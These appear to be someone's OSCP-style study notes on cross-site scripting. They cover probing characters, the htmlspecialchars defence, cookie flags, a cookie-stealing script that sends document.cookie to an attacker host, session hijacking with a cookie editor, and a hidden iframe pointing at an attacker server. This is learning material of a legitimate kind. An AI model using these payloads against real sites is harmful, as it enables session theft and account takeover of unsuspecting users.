<> 
'
"
{}
;

Step 1 try entering these in comment sections to see how it displays.

if you inspect the web pages and still see those raw chars, it's vulnerable!

if not properly filtered (PHP) -> "htmlspecialchars" function should be used to properly sanitize it, which convert key characters into HTML entities.

Step 2 famous <script> alert()</script>

Step 3: Steal cookies and session info

What's cookies and what can we do with them?

cookies -> websites have them to track state info about users. Cookies can be set with flags that are not required. We want to look for Secure and HttpOnly flags

• Secure flags - intruct browser to only send the cookie over encrypted connections

• HttpOnly flags - it denies JavaScript access to the cookie. if it's not set, we can easily steal the cookie by using an XSS.

The following script sends a GET request to the attacker's machine and force the victim to send the cookie (PHPSESSID) with it.

<script>new Image().src="http://Attacker_IP/cool.jpg?output="+document.cookie;</script

If a user logs into the server, we get a call back and steal the cookie.

Use a cookie editor to add the session info and visit an admin only pages!

OSCP book didn't cover any non-client facing XSS.

Client side attacks:

invisible iframe

<iframe src=http://attacker_IP/malicious height=”0” width=”0”></iframe>

people who visit the site that has this invisible iframe will connect back to the attacker's machine! (attacker can set up a netcat listner)